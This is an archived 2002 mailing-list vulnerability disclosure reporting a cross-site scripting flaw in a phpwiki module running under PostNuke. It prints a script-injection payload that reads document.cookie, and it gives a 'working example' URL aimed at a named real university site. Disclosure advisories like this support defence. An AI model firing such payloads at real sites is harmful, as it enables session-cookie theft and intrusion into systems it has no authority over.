OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Pistone (jorgep_at_spdps.com.ar)
Date: Tue Jul 16 2002 - 19:49:24 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

    - ----------------------------------------------------
    Class : input Validation Error

    Risk : Due to the simplicity of the attack and the number of sites
                       that run phpwiki, the risk is classified as Medium to High.
    - ----------------------------------------------------
    This wiki is running as a PostNuke module.
    - ------------------------------------

    Exploit: pagename=|script|alert(document.cookie)|/script|

    Change | x <>

    Working Example :

    http://centre.ics.uci.edu/~grape/modules.php?op=modload&name=Wiki&file=index&pagename=|script|alert(document.cookie)|/script|

    - --------------------------------------------------------------------------------------------
    programmer of wiki module and admin of postnuke-espanol.org receives a copy
    this report.
    - --------------------------------------------------------

    Salu2

    Pistone
    - - --------
    http://www.gauchohack.com.ar
    http://www.hackindex.org

    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v1.0.6 (GNU/Linux)
    Comment: For info see http://www.gnupg.org

    iD8DBQE9NL8cY47Vx76lNPkRAsNDAJ9M5eXRMxL1ASb2TlWaDaveotKAbgCZAQSz
    PlAN98+qigqp8S9pkkfFRm4=
    =c2FT
    -----END PGP SIGNATURE-----